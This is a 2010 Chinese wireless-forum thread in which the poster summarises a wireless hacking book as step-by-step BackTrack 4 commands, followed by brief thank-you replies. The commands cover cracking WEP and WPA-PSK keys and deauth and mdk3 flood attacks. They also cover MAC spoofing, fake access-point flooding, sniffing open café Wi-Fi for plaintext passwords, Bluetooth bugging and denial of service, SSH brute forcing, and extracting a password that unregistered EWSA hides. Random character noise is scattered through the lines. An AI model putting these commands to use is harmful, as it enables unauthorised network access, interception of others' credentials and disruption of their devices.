查看: 11012|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3718

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。
+ j5 h6 S* J" B4 P+ \& f/ M. u5 o% x, ^
以下所有操作均在BackTrack 4中进行。
: H( m4 m- C% F/ g6 c' ^  m& c/ J
9 p( y( z' q7 h
* s, V6 h4 [/ J2 t  _( B# a无线WEP加密P解:4 g3 j2 N# ~8 b" c8 }" n) m
* \3 @2 X) f) C$ v" w" e1 d
注入P解:" L, \) a+ F3 p' k: Z+ u

; z$ u! H) D/ w- e! qifconfig
( b: X& ~0 f' k! O, J6 M& u+ V* W6 m' f" m+ n; T' J
ifconfig –a
* @" y4 s- ]2 p5 R. P7 I2 s- ?! _6 J) n" F
ifconfig wlan0(无线网卡) up
8 u# ?( k5 U* }& o9 V& c9 }! K4 L1 F( _& U7 G# L& K5 ^* ]
airmon-ng start wlan0. h' {" P. N6 L

0 M: }) H9 K4 K# G! O, `9 sairodump-ng mon0
* p$ P; e% D) v) }5 ?( t  h
# {2 C6 X1 G+ a6 f7 M) Jairodump-ng --ivs –w ivsfile –c 频道 mon0或
1 E. D3 \3 J( K& G3 I8 r; X
5 v7 P9 R/ a0 ]) k; Cairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
7 B& u6 f% r( w; l; @) E/ g
% ?2 o' x1 {3 f! z8 Jaireplay-ng -3 –b BSSID –h Station mon0: B$ U( Y7 k9 ^2 b; B

0 h! E2 S  y. Yaircrack-ng ivsfile-01.ivs/ d9 S6 u4 C9 q. l0 K
8 }$ ^5 n& j7 G6 X; X
虚连接P解(适用于无客户端连接APP解)
# [6 a7 Q# C9 U. ~- f% h9 q  h
4 z' X' X8 w4 K: Tifconfig( T" D2 W2 S3 C& K+ I) ^
0 m) g  }* k" @9 B! H& y
ifconfig –a* k, e# l- O/ p8 x8 J; W/ D

: M. f& c- t& V! [ifconfig wlan0(无线网卡) up
( i9 V& G- ^1 k0 D- R3 j; x2 _
( @5 K1 W7 @! k2 j( o+ Gairmon-ng start wlan0! e2 {( \; O; f9 P" ~
' P/ c! c( n# p+ i+ G0 K2 w" x
airodump-ng mon07 O& s5 s! g# g/ c8 F
$ S, M0 L6 M4 v  j- e& K3 S
airodump-ng --ivs –w ivsfile –c 频道 mon0或
- h6 d; c- ]( w& I
( U6 q$ Q7 @1 w7 Z1 L/ u9 Tairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon07 c5 g4 q, a9 s

# C5 _% k6 s' I/ B, kaireplay-ng -1 0 –e SSID –a BSSID –c Station mon0! t- U: M/ f# i4 H; i/ s

3 J# P+ Z7 p4 ~) e/ Uaireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0
1 E5 a2 P7 n5 k7 D
* K3 U: @4 U5 I( A0 u  Iaircrack-ng ivsfile-01.ivs* s2 A$ ~5 o  Q" k6 k6 D1 m
7 G9 Z# t1 F! T/ {

0 P7 O7 d! e2 _: n" E4 j% Q还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。4 o& H2 N1 v+ i# F

# u/ D) A! t( U  Y) z) h1 v1 {! e8 ^0 w2 p* U
WPA-PSKP解
9 N' z  g) E2 K# P# B5 k  `, m) r3 o+ `6 ^# j
ifconfig: x- R: N8 ~5 N
+ o& c, r4 s" ]# g
ifconfig –a3 H) G5 T  o8 W

6 d: B) m, Y  E* ?& M' {  Gifconfig wlan0(无线网卡) up
  i- h$ C& V( F
3 r. y. ~: K6 C6 \) Rairmon-ng start wlan0* L+ g" i  j5 E( q. ]" w6 x+ b
+ M  q* q+ N5 L
airodump-ng mon0
3 e; Y/ X( G0 V: b# w
/ V: e( P% l  j0 q5 Hairodump-ng –w capfile –c 频道 mon0- y$ {/ }% H1 p! j6 p

- v0 |0 S  \& Taireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包
* f/ N7 X8 U3 y2 L$ _6 j+ v5 w  A1 n" [
aircrack-ng –w Dic capfile-01.cap或
- U- |% l( A( P0 g& h
! T" Y% c7 O& r% ]! o; Wcowpatty –f Dic –r capfile-01.cap –s SSID4 S8 D. @. u2 n/ e& C

1 t, J0 n& [# @# V# h& i/ Ocowpatty –d HashTable.Hash –r capfile-01.cap –s SSID0 A5 l' N4 n  z/ E: S3 H
1 P/ J0 W# g6 e0 j# B; j
傻瓜式P解软件SpoonWPA。0 d+ f& c4 M' t; M1 S& t

& A$ r3 q7 y4 X& L  M: GBT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst
' V2 [2 W! }2 J% x: e4 r4 w" h- M/ E+ K- W2 D/ k

* [3 C0 T/ b, b字典文件的生成和上传
7 ^4 v) ?  j" x) s- a$ |* X* @* j4 l/ ]1 v
在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。$ \4 Y% L" Q( ], c" N7 n. h' H

/ G! h, Z( z0 ?. l) n+ ^
( w+ S+ Y/ }& T; bBT4下开启Tftp:Services—TFTPD—start TFTPD7 o! P; a  ~3 o  x2 H2 C( T0 }# g

# ^, \; d4 k0 z& ~  N) v! i' w在Windows的CMD中运行 tftp –i IP put **.dic! a5 \9 L/ V3 @6 d; N

' k) S& d8 f. N2 T+ K
& m0 ~; i  H$ R2 iBT4下开启SSH:Services—SSH—start SSH! U( k: }: |8 }3 f7 _5 f

) W; b; b. A. c; x0 J# F. s! ~Windows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root
& ^. [8 X& g9 M" L& h6 o) J4 S" z# }+ F, |( W4 r* [! O4 a# e

9 q" O* z2 b/ y: Y4 sAP限制MAC时的解决
9 g8 g* ?8 H" X0 E; Z+ M$ d$ A$ T& P0 ]8 N
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:
* V/ v' _4 t: P! Z1 E6 L
. w3 Y0 m& o; K6 u, w" A+ Gifconfig wlan0 hw ether NewMAC* x0 H8 l" M; {, t( F4 m$ x# U: E5 q
- h1 |" y! Z# o& L4 l' E5 G

3 s: y, Z+ Q1 h关闭SSID广播的AP探测:/ `5 E. e; U  T; Z# _- i
9 r, \8 f4 a! ?! A( s
1.     Deauth攻击:  S1 {9 x# |7 U" D
1 r( H, `9 B& n/ z/ ~; X" j. i
airodump-ng mon0
4 b/ A, Y: S. B! K- p9 b+ [( M/ O9 b3 {
aireplay-ng -0 10 –a BSSID –h Station mon02 a2 @2 u9 v5 Q/ ?' H$ X+ n3 @2 o
, U* @  H2 o5 B; I7 Z3 f5 O
2.     抓包分析
) _4 G" N$ @3 D! E8 I# F! t8 P4 D3 K8 Z' c% |% x; Z0 C- o. N
Omnipeek- j5 S" X. j# Y; M- D+ |
! h7 o8 l! `, Q4 d
Tcpdump –n –e –vvv –i 网卡名0 V* x8 |0 X; m$ a# a6 Q3 [

) p5 I$ u5 O, n2 t3.     暴力P解3 u' S+ t. `8 q, `
7 w5 |6 H8 n* e
Charon 1.1暴力P解
% M2 s0 `4 X5 p) V1 E3 H, q  y2 V7 ~) N
5 ]4 t8 r! a( @! _1 l
无线加密数据包的解密* r. d: W( E$ z2 q
0 J+ O6 L' I2 v# n0 \$ ]
9 L, ]" P4 M3 R/ T) l9 a
使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
1 Y& Y6 X2 B  `/ V( A
! j/ A- R0 v6 G  n% u$ tFilterNS     DNS解析数据包
. L  }, H8 [  o7 Z, Z
8 s! I5 C- _) ZFilter:HTTP    WEB访问数据包: E& S$ J  e+ }8 q- x+ F% J( q

) T$ t" I5 r* r" c0 dFilter:msnms   MSN: P% C- {* P0 N7 F

! ~6 Q  n* z8 t. p/ j% e- iCtrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。
. Y8 K% n/ Y2 }0 Y) e9 Q6 T0 G# |3 Q* d& P5 @
使用airdecap-ng解密:
* @  [9 h0 C  [/ h
* z  |4 y+ i6 X* q, i& u9 RAirdecap-ng –b BSSID –e SSID –w 密码 ***.cap
4 G5 W9 o, s( r: `, d1 I# G$ g. @* b' p6 L  f. f: D: ^/ \; C

" l6 W; c  U) o$ V2 b3 z咖啡馆中无线数据截取(开放式无加密AP)! o: J8 b( R; e4 @+ E3 {. _; k. W4 |

+ v2 j. d$ l: g- p1.Airodump-ng –w data –c频道 mon0% P0 T# _+ Q, O: Q) Y# T0 ^
0 ~& E( P3 Z5 C7 R+ _+ \8 K' J1 Q1 e
2.使用WireShark打开分析: K3 j2 |! x5 L0 k! p1 D, H

& t% C( O# f2 Y/ i4 ]3 M+ ]4 v0 }2 w0 T/ J; s# M
BT4下的渗透工具:" Q* c1 W+ F: M  u
! k8 ^. D5 S  Y! G! Y
nmap –sP IP/24        判断C段下存活的主机 7 U7 j& D. `; V' Z% |

( L, R6 l7 v2 F% E* ~. |0 U& snmap –vv –sS IP/24 –p Port    扫描指定端口是否开放
) }6 q5 R& T, [6 ~4 g! I8 w# l6 x( `2 U+ s6 M4 J- g
nmap –vv –sV IP –p port   指定端口的详细信息。。。" ]5 D6 c- e1 W; Z4 n; X4 u
$ `& u* n3 C' i
namp –O IP/24    判断主机的系统版本% ~( @  Q2 q9 P. m6 T/ m9 u7 K+ i

5 {9 v6 g4 W% J' T' H+ ?; J& B/ Z: F, E5 i$ D
GUI 版nmap:Zenmap
2 _3 r. n, B% |+ j: z8 G* {% U
9 ?0 v2 l8 N- f, |5 c0 x! C
( x8 q5 N& B+ i! OAmap使用:amap –B IP port
$ H6 f" b5 {+ F6 }
# G+ k5 C, E4 u( `; }. tNbtscan(扫描Windows网络NetBios信息):
7 L0 M! G1 |& }2 r8 m$ p+ a4 T2 Y" P" U7 S# p
nbtscan –v –s : IP/242 U+ u9 E! q1 F  c
. V  T( G9 }* j, f: o
nbtscan –r IP3 j4 m5 f4 T* f- w

' D! P) Z4 T/ U2 p# q" \* U/ c# L. n5 d6 i2 \. C: f- \
DNSWalk(指定域名的DNS探测):./dnswalk XXX.com.  }! Q% L; J  {9 E3 o+ S
- g0 K9 H. Z- [  U

) S: L5 O- M& u8 O! x7 z' L. fHydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)
6 {* H/ o3 Z5 v5 Z8 i2 f) ~/ i" Q  q" u0 X6 X. V& Z
BruteSSH: ./bruthe.py –h IP –u Username –d Dic; [3 @* C! T3 s- {

, `% z& c  p) h; b% [" vMetasploit3使用$ ~: b% J. b8 _, c4 X% K% o4 ~3 V8 F
无线D.0.S2 Q* K+ B" r8 G* f7 v* B# y

% K, ~8 {- h& ~* ~. ~) n, t3 T/ P! N( ~: t0 K% }; z
Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)
9 i* W" `$ Q- B  V. ]. N, e# l7 O, n/ D8 l, O. |  H: B' d
airmon-ng start wlan0
( O$ A, R$ j! o' i, Q2 R( A& E/ G
4 H( l! t, b8 ~/ _: n' \$ bairodump-ng mon0
* ?2 g4 t/ B# E$ _  d/ D* w. H" y- T# H& x& ^
mdk3 mon0 a –a BSSID
( r6 d- o+ m% H. x% p/ z8 [! W9 l; B5 W' ^4 F2 Z) j
对所有的AP攻击:mdk3 mon0 a
; U) P# t% F" P7 K6 f  y# i8 ?1 r) C
5 t& J1 I1 w- X; u0 }: E9 _" n  O
Deauth Flood 攻击* s" w: K, g  O( @, t/ B
0 ]& O! ]6 Z  I7 k* I% O7 y  G
mdk3 mon0 d –c Channel
3 @- t7 L6 v/ v9 J9 Z5 }9 I) N% R% S5 ^0 R# X" e
图形化D.O.S攻击:Charon
0 o9 }2 f0 ^8 A8 i# Q) D6 z- m, B: I+ L5 ^3 h& F/ T

6 G' e! B( v7 I" V% m当受到攻击时,使用Wireshark抓包可以看到异常信息。9 s& I5 o- G* x/ K
( k# [& L! T3 X* @( B' F

% Q( O2 K, b5 J8 t3 QWPA-PSK高速P解
4 D9 ~; e6 ~" }0 q9 M' e! ^: M5 k/ a
1.       WPA-PSK PMK Hash TablesP解& \% t* a, y1 p
4 h" h. w% G4 Z6 G  M
Cowpatty –d HashTable.hash –r ***.cap –s SSID
: e! Y$ }5 Z  w% B* L) T' U) w4 X( v& ]4 U; L6 \3 _
Hash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
' U7 z4 b- G: V4 Y, L8 X3 F
9 c5 v5 ~$ s: f2.       GPU辅助高速P解$ C7 F5 I. l/ V. @9 o
  d: p# n7 y/ H) J) z
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。
5 k% f8 Z) R! ]$ q; }) c
8 E: M  u8 |- c( v! v3.       分布式P解9 }; e8 H( c/ d) |, ^& x6 h
( A3 q% a# w( T* ^# o: `

$ G2 e- @0 B" v( u5 C( wAP的伪造) Y, r# X  K) t* {" G

" z2 L" ^% a* C, X3 y7 e- ]把AP的MAC改成目标AP的MAC+ K  u6 ]# U/ G8 L

. ]( c. d4 T% T7 M5 ~' P网卡软AP1 L: E( O1 ^4 a4 g9 C& [" f* p

+ G& }+ M! W; @# ]( _* F: w2 X8 g7 s& C9 s- J7 U; B, D
伪造大量虚假AP信号:
3 P  G9 L" m( r# T$ w% c4 ~
  D% ^; F' _8 F8 z随机SSID:mdk3 mon0 b –g –c 频道
  g! P) |  s/ Z9 z, G: s
  c; {: F' `" U指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度! k& t  P' J' f4 w8 z1 p+ u$ D7 j

" p" E4 Y4 r0 K
: r' ^7 o! \7 ^+ u" {War-Driving
- A# g. ]( a( v: M4 y* k5 l; U! Y0 i0 |. [' e* q
热点地图绘制
& Q: g# p# Q: t- {' Y, f
. t* ]' V0 C7 }. h  DWindows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。. c9 v+ Z% @) _6 B
% I) x) l! @0 h$ e

$ q% {. t9 I: J5 D2 q, XNetstumble# a; ?4 v! z7 g! s$ Z2 P

" c' U( R9 e6 a6 D5 h* Z- z/ e! n7 |1 \+ n7 z2 Z, N8 X
蓝牙Hacking
; _4 Q' A2 k& {& S% _4 @1 Q+ V6 Y0 H4 a# d5 l: C5 ~
Windows下的Blue Soleil工具& ~$ u/ z- P5 i3 b* f5 p$ o7 r

5 Q5 D! t/ ^9 T1 @1 H& P4 g1 _) wBT4:
! ?  e4 ~4 h6 u# a, ^7 }- Y0 D/ P! }4 |+ p% d) O
hciconfig 查看蓝牙适配器
" J6 Q* W2 O1 }4 N! e$ U
: t& a  Z: M6 ~% m: xhciconfig hci0 up 载入蓝牙适配器
5 t! A7 Z# `* |2 X) F5 ]% J* `: X1 p) G: t$ j' ~. N1 Z
hciconfig hci0 class 蓝牙适配器详细信息# j$ g- S" h% {$ i! T2 k
; G7 ^  l* T' {% t
- E8 r. ?# Q0 }! A3 P- @! L) q0 Q
hcitool(扫描蓝牙)
3 z) B% D& j( S% r& ~
- j* a  C' Z1 v; Y% Whcitool –i hci0 scan3 Z7 k* h; ]% h& _2 t* x7 e% i

' z/ Z0 U6 C9 g) CBTscanner(扫描蓝牙)( |- A  {# \/ e2 u' F/ g& e

  w7 B# N# A. m' X
. Y3 s! L9 R2 o6 ^- _蓝牙攻击:" @0 v- P  k7 g

9 J1 }; O  w# b' ~2 vBlueBugging (适用于BlueTooth V1.1的手机); K( j" y0 r" `

4 q0 A7 F- r1 w) wBluebugger工具:
7 |0 `6 G% }+ P/ B" J$ t' s) L5 S' `2 }! ~& u2 R+ n( g
Bulebugger –a HD_Addr info
& Y4 \5 o9 r8 D1 h5 q* ^* W: \
; V5 r5 h* \. D3 m  _
$ V! D6 C; y2 _6 H7 \, YBlueJacking
7 V6 O; O3 L2 ]: t' t% d
; w( l- {& P' b实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。
8 M% I2 i/ G+ w4 `
+ L! x3 K! `% \
2 F" q5 d8 Y4 Y* i( mHD_Addr修改:3 x3 D" V! z3 ^; t
& Q5 J8 X6 Y3 `$ T0 U
Bdaddr工具
% S$ {  u" w/ I0 ^8 ^+ W9 q- ~; I" ?3 {/ Y+ q
bdaddr –i 蓝牙设备名 新HD_addr4 Y' ]2 T. L* a5 y
, H' h6 {7 ~$ B7 ?

1 L  L4 ^' ~) M; N6 G8 q9 K蓝牙D.O.S
* \- O. m0 D: a8 ]( o" S# g2 Q% f
5 ?* x9 V; u8 S  t" N1 T' r1 x$ U0 ~l2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务
( v( I5 x( x4 X- y0 z% ~, B
# U% k* ]/ q. D. Uhciconfig+ x9 ~7 u) e) w1 L4 S- G# ~

/ _4 u9 \  z: R1 s: `' [: Lhciconfig hci0 up- G' s0 P. T: V$ p5 r

# b3 T# l. R% l: f! n* c0 ihcitool –i hci0 scan: Y* G- w- K* w( a
) j; s) j9 c* y6 C) H  _5 ~. Y
l2ping –s 10000 –目标MAC) N4 c! l( T! Z: j3 K
6 p1 U' u! {2 O2 q1 V4 J9 m

3 q( y9 M* @6 s不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)$ u* s* [: I$ m, E

/ \: |& R+ s! E& w./fang –r ************-############ -s
  M: `, i+ v" W. j" @
5 M+ a1 v+ ]3 p% `  J+ G$ t, {- P暴力P解************-############的蓝牙设备2 [0 M; P# }/ o, m
1 O$ }- ^: l" l
./fang –l 各厂商BD_Addr分配% Y- O8 P' g  v' u: K9 a$ ^/ d0 Q

% @) W% }, G' ^& k. U. U' V- r9 [3 W: ]4 l
WifiZoo使用
% ]# m! L2 r0 L3 L- H4 s+ \% G
8 t; l* o  Z( d. s0 W1 `8 Z$ b./wifizoo.py –c Capfile
0 T- O( o- @5 y+ K7 s2 w  k9 F- S$ q% v
访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

835

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

140

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2266

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1138

积分

上尉

签到天数: 5 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

257

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

909

积分

中尉

签到天数: 13 天

[LV.3]偶尔看看II

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。
% A" s' O" H. I  p+ G借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的; l/ K; n$ I! U+ w; c5 E" ?6 Z. c: z
呵呵 其实也不贵 21块 快递再一点
- l, m4 r6 O/ E4 i( T; W1 @我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

Archiver| 手机版| 中国无线门户 ( 粤ICP备11076993 )  |网站地图    小黑屋 | 免责声明

GMT+8, 2017-5-23 22:38

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表